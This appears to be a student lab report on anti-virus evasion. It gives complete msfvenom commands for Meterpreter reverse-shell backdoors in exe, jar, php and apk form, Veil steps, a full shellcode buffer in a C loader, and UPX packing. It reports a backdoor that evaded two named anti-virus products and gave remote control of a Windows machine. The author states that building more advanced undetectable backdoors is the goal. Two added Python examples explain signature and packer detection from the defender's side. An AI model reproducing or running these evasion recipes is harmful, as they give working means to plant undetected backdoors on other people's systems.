2019-2020-2 20175309 Liu Yuheng "Network Warfare Technology" EXP3: Anti-virus Evasion Principles and Practice

I. Experimental tasks

(1) Experiment content

1.1 Methods:
· Correct use of msf encoders
· Generating other file formats with msfvenom, such as jar
· Veil
· Programming with C + shellcode
· Packers
· Other methods not covered in class
1.2 Combine several of these techniques to produce malicious code that evades anti-virus software
1.3 Test on another computer with its anti-virus software on: run the backdoor and get a reverse connection, and note the name and version of that computer's anti-virus software

(2) Basics

1. Malware detection mechanisms
1.1 Signature-based detection
· A signature is simply one or more fragments of data. If an executable (or a library, script, and so on) contains that data, it is judged to be malicious code.
· What AV vendors do is try to collect the most complete and up-to-date signature database, which is why keeping anti-virus software updated matters: an outdated signature database is of little use. (AV, anti-virus, here means the malware detection tools we usually call anti-virus software.)
1.2 Heuristic malware detection
· Put simply, a heuristic infers from partial features, usually because there is no exact basis for a decision. Applied to malware detection: if a program does what malware usually does and looks like malware, treat it as malware. Typical behaviours are connecting to a malicious website, opening ports and modifying system files; typical "look and feel" features are the file's own signature, its structure, vendor information and so on. Each vendor defines its own detection patterns.
· Advantages:
  - can detect 0-day malware
  - has some generality
· Disadvantages:
  - real-time monitoring of system behaviour costs somewhat more
  - accuracy is not as high as signature-based detection
1.3 Behaviour-based malware detection
· When heuristics were first proposed they were still aimed at feature scanning, that is, general but inexact scanning over multiple features; behaviour-based detection was proposed later. In theory, behaviour-based detection is equivalent to a heuristic, or a heuristic that includes behavioural monitoring.
2. Anti-virus evasion
Definition: evasion means keeping a planted backdoor from being found by AV software.
Methods:
(1) Change the signature
· If you only have the EXE:
  - packers: compression packers and encryption packers
· If you have the shellcode (e.g. Meterpreter):
  - encode it with an encoder
  - recompile an executable around the payload
· If you have the source code:
  - rewrite and recompile it in another language (veil-evasion)
(2) Change the behaviour
· Communication:
  - use a reverse (call-back) connection
  - use tunnelling
  - encrypt the communication data
· Operating mode:
  - operate in memory
  - reduce modifications to the system
  - mix in code with normal functionality to obscure the role of the malicious code
(3) Unconventional methods
· Use a vulnerable application as the backdoor and write the attack code as an MSF module.
· Use a social-engineering attack to trick the target into turning off the AV software.
· Hand-craft the malware.

II. Experimental procedure

1. Correct use of msf encoders

· Generate an encoded backdoor:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.95.128 LPORT=5309 -f exe > exp3.exe

· Checking it on VirusTotal: 56 of 71 detection engines flagged it. A poor result.

· So what happens if we run the encoder ten times when generating the backdoor?
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.95.128 LPORT=5309 -f exe > encoded10.exe

· Checking again: 57/72. Hmm... it seems the probability of detection went up?
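To see why an encoder changes the payload bytes yet leaves the file detectable (the signature-based detection described in the basics above, and the 56/71 and 57/72 results here), the following Python example is added to this page; it is not part of the original report and not Metasploit's code. It stands in for shikata_ga_nai with a toy additive-feedback XOR encoder and a constructed decoder stub, and uses the first 30 bytes of the shellcode listing that appears later on this page purely as sample data. A signature on the raw bytes stops matching after encoding, but a signature on the decoder stub matches every encoded output, and encoding ten times only wraps another copy of the same stub around the previous one, which is the outcome the VirusTotal numbers show.

```python
# Added example (not from the original report, not Metasploit code):
# a toy encoder with a fixed decoder stub, and a naive signature scanner.

# Constructed sample data: the first 30 bytes of the shellcode listing shown
# later on this page, used here only as bytes to encode (never executed).
RAW_PAYLOAD = bytes.fromhex(
    "fce8820000006089e531c0648b5030"
    "8b520c8b52148b72280fb74a2631ff"
)

# Constructed stand-in for an encoder's decoder loop. A real decoder (e.g. the
# shikata_ga_nai loop) is machine code that must precede the encoded bytes so
# they can be restored at run time; the point is that it is not itself encoded.
DECODER_STUB = b"\xeb\x10DECODER-STUB\x00"


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR each byte with a rolling key; the key advances using the encoded
    byte, which a decoder can reproduce without knowing the plaintext."""
    out = bytearray()
    k = key & 0xFF
    for b in data:
        e = b ^ k
        out.append(e)
        k = (k + e) & 0xFF
    return bytes(out)


def xor_decode(data: bytes, key: int) -> bytes:
    """Inverse of xor_encode: same key schedule, driven by the encoded bytes."""
    out = bytearray()
    k = key & 0xFF
    for e in data:
        out.append(e ^ k)
        k = (k + e) & 0xFF
    return bytes(out)


def encode_once(payload: bytes, key: int) -> bytes:
    """Output layout: [fixed decoder stub][1-byte key][encoded payload]."""
    return DECODER_STUB + bytes([key & 0xFF]) + xor_encode(payload, key)


def decode_once(blob: bytes) -> bytes:
    if not blob.startswith(DECODER_STUB):
        raise ValueError("no decoder stub: not produced by encode_once")
    key = blob[len(DECODER_STUB)]
    return xor_decode(blob[len(DECODER_STUB) + 1:], key)


def encode_iter(payload: bytes, iterations: int, key: int = 0x5A) -> bytes:
    """Mimics msfvenom -i N: each pass wraps the previous output in another
    stub, so the outermost bytes are always the same stub."""
    out = payload
    for i in range(iterations):
        out = encode_once(out, key + 0x11 * i)
    return out


def decode_iter(blob: bytes, iterations: int) -> bytes:
    for _ in range(iterations):
        blob = decode_once(blob)
    return blob


# A signature is just a byte string; a file containing it is flagged.
SIGNATURES = {
    "raw_payload": RAW_PAYLOAD[:12],   # what the unencoded payload looks like
    "decoder_stub": DECODER_STUB,      # what every encoded output looks like
}


def scan(sample: bytes, signatures: dict = SIGNATURES) -> list:
    """Return the names of all signatures found in sample (substring search)."""
    return [name for name, sig in signatures.items() if sig in sample]


if __name__ == "__main__":
    for label, sample in (("raw", RAW_PAYLOAD),
                          ("encoded x1", encode_iter(RAW_PAYLOAD, 1)),
                          ("encoded x10", encode_iter(RAW_PAYLOAD, 10))):
        print(f"{label:12s} hits={scan(sample)}")
```

The scanner flags the raw bytes on the plain payload and the stub on both encoded variants. The real encoder randomises its register choices and key, so the stub signature is fuzzier than a fixed byte string, but the structure is the same: the decoder must run before anything is decoded, so it cannot hide behind the encoding it implements.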

2. Generating other file formats with msfvenom, such as jar

· Try another way: generate the program as a jar:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.95.128 LPORT=5309 > 20175309jar.jar

· Checking again: 20/56. The detection rate dropped markedly; a good result.

· Generate the backdoor as a php program:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.95.128 LPORT=5309 > 20175309php.php

· Test result: 3/59. It fools almost all of the AV engines; a very good result.

· What if the target is a mobile phone? Generate an Android apk sample and see (doing this for iOS is unlikely to work):
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.95.128 LPORT=5309 > 20175309apk.apk

· Detection result 25/62: not as good as the previous two, but still better than the exe.

3. Veil

· To use Veil it must first be installed. Installation is simple: run sudo apt-get install veil and answer y whenever prompted. It takes a long time, but as long as no error appears it has succeeded.
· Type veil to enter Veil (similar to a debugger prompt), then type use evasion to enter Veil-Evasion.

· Type use c/meterpreter/rev_tcp.py to enter the configuration page.

· Set the call-back IP: set LHOST 192.168.95.128
· Set the port: set LPORT 5309

· Type generate and then the name of the program to generate; the path where the program is saved is shown in the output.

· Now for the exciting detection moment: let's see how strong the program we put so much effort into is.

· 46/72? Roughly a write-off, but at least the detection rate dropped compared to the directly generated one, which is gratifying.

4. Programming with C + shellcode

· Try the old routine from our previous experiments. Generate the shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.95.128 LPORT=5309 -f c

· Create a C file with the shellcode embedded:

/* Shellcode as emitted by msfvenom -f c. The listener address and port are
   baked into these bytes, so regenerate them whenever LHOST/LPORT change. */
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x7a\x88"
"\x68\x02\x00\x14\xc5\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main() 
{ 
    /* Treat the buffer as a function and jump into it; the shellcode
       connects back to the listener and never returns on success. */
    int (*func)() = (int(*)())buf; 
    func(); 
    return 0;
}

· Compile it with i686-w64-mingw32-g++ 5309.c -o 5309.exe to generate the executable backdoor.

· Off to the detection site to see how our new approach and all that effort turned out.

· Still 46/72??? I feel like I've been played...

5. Packers

· Since none of that worked, let's modify the virus by giving it a protective shell, like a wartime sniper putting on a ghillie suit to hide, and hope it slips through the check that way.
· Run upx 5309.exe -o 5309pro.exe to pack the program just generated, naming the result 5309pro.

· Test it again.

· A modest improvement, but at least it worked.
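The modest improvement from UPX has a simple explanation that a practitioner can check: a packer replaces the code with compressed data plus a decompressor, but it leaves markers of its own, and UPX names its sections UPX0 and UPX1. The Python example below is added to this page (it is neither the report's nor UPX's code): it parses the section table of a PE file and flags those names, and includes a Shannon-entropy helper, since near-random section contents are the other common packer heuristic. The minimal PE images it builds are constructed test data with headers only; on a real file, read the bytes from disk and pass them to pe_section_names.

```python
# Added example (not from the original report, not UPX code): read the PE
# section table and apply two packer heuristics, UPX section names and entropy.
import math
import struct

COFF_FMT = "<HHIIIHH"          # Machine, NumberOfSections, TimeDateStamp,
                               # PointerToSymbolTable, NumberOfSymbols,
                               # SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes, Name first


def pe_section_names(image: bytes) -> list:
    """Return the section names of a PE image, following
    e_lfanew -> 'PE\\0\\0' -> COFF header -> optional header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, nsections, _, _, _, size_opt, _ = struct.unpack_from(COFF_FMT, image, coff_off)
    sec_off = coff_off + struct.calcsize(COFF_FMT) + size_opt
    names = []
    for i in range(nsections):
        off = sec_off + i * struct.calcsize(SECTION_FMT)
        (raw_name,) = struct.unpack_from("<8s", image, off)
        names.append(raw_name.rstrip(b"\x00").decode("ascii", "replace"))
    return names


def looks_upx_packed(image: bytes) -> bool:
    """UPX leaves its default section names (UPX0, UPX1, ...) unless renamed."""
    return any(name.startswith("UPX") for name in pe_section_names(image))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data up to 8.0 for uniformly random data.
    Compressed or encrypted sections sit near the top of that range."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_min_pe(section_names) -> bytes:
    """Constructed test data: a PE image with valid headers and an empty
    optional header, enough for the parser above but not a runnable program."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_FMT, 0x014C, len(section_names), 0, 0, 0, 0, 0x0102)
    sections = b"".join(
        struct.pack(SECTION_FMT, name.encode("ascii")[:8].ljust(8, b"\x00"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 * (i + 1),
                    0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(section_names)
    )
    return dos + b"PE\x00\x00" + coff + sections


if __name__ == "__main__":
    for names in ([".text", ".data", ".rsrc"], ["UPX0", "UPX1", ".rsrc"]):
        img = build_min_pe(names)
        print(pe_section_names(img), "upx packed:", looks_upx_packed(img))
    print(shannon_entropy(b"A" * 64), shannon_entropy(bytes(range(256))))
```

Renaming the sections defeats the name check but not the entropy check, which is why packing alone tends to move the VirusTotal score only slightly: the packer hides the original signature and hands the scanner a new one.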

6. Other methods

· Try another approach and see how effective it is.
· Enter Veil-Evasion and type list to view the available payloads.

· Here I chose number 32, which appears to be a Python payload that encrypts the shellcode with the DES algorithm.
· Type generate to generate the program, and choose 2: msfvenom.

· Press tab to auto-fill the payload and IP, and enter the port number yourself.

· Then enter the file name (here named 6 by a slip of the hand) and continue by typing 2.

· Going to the directory, the backdoor file xxx.py has been generated.
· Then the familiar check.

· Finally, hard work pays off: only Microsoft detected it and every other engine passed it. The result is perfect.

7. Combining the techniques above to produce malicious code that evades anti-virus

· Host environment: Win10; anti-virus software: Tencent PC Manager 13.5
· Continue using the shellcode-injection technique above to produce a new program.
· Then pack it.
· Share it to the Win10 host through a shared folder and run a virus scan.
· The anti-virus software does not detect it.

8. With anti-virus software on, run the backdoor on another computer and get a reverse connection, noting the name and version of the anti-virus software

· Host environment: Win7 Enterprise; anti-virus software: 360 Security Guard 12
· Send the backdoor lyhnb from kali to the Win7 machine.
· Type exploit to start listening, then open the program on Win7 to get the reverse connection.
· Kali successfully gains control of Win7: the backdoor ran on Win7 and successfully evaded the anti-virus software's check.

III. Reflections on the experiment

My biggest feeling is that I was finally able to produce a backdoor that evades anti-virus software, and no longer have to shut down as many obstacles (firewall, anti-virus software) as before to get the desired effect.
But clearly my level is still very limited: once the anti-virus software is updated again, the backdoor we generated will be detected and removed, so learning the skills to make more advanced programs that evade anti-virus detection is the goal of our unremitting efforts.

IV. Answers to questions

(1) How does anti-virus software detect malicious code?
A: Currently the most widely used approach is signature-based detection: if a section of code in the program matches a signature in the anti-virus software's signature library, it is judged to be malicious code and removed.
The future trend is heuristic detection, where the anti-virus software judges for itself whether a running program behaves like malware; it has a flavour of artificial intelligence and needs further study. Its advantage is that it can act preventively; its disadvantage is that it easily flags innocent programs.
(2) What is anti-virus evasion?
A: Using technical means to keep an illegitimate program from being detected and removed by anti-virus software.
(3) What are the basic methods of evasion?
A: Changing the signature: packers (compression packers, encryption packers), encoding with an encoder, recompiling an executable around the payload, rewriting and recompiling in another language (veil-evasion).
Changing behaviour: communication (using a reverse connection, tunnelling, encrypted communication data) and operating mode (operating in memory, reducing modifications to the system, mixing in code with normal functionality to obscure the malicious role).
Unconventional methods: using a vulnerable application as the backdoor and writing the attack code as an MSF module, social-engineering attacks that trick the target into turning off the AV software, hand-crafted malware.
(4) Can malicious code be prevented absolutely as long as anti-virus software is on?
A: I originally thought so, but this experiment shows that anti-virus software cannot guarantee to stop malicious code one hundred percent; after all, anti-virus software also needs to be improved and upgraded over time.

Origin www.cnblogs.com/20175309lyh/p/12602014.html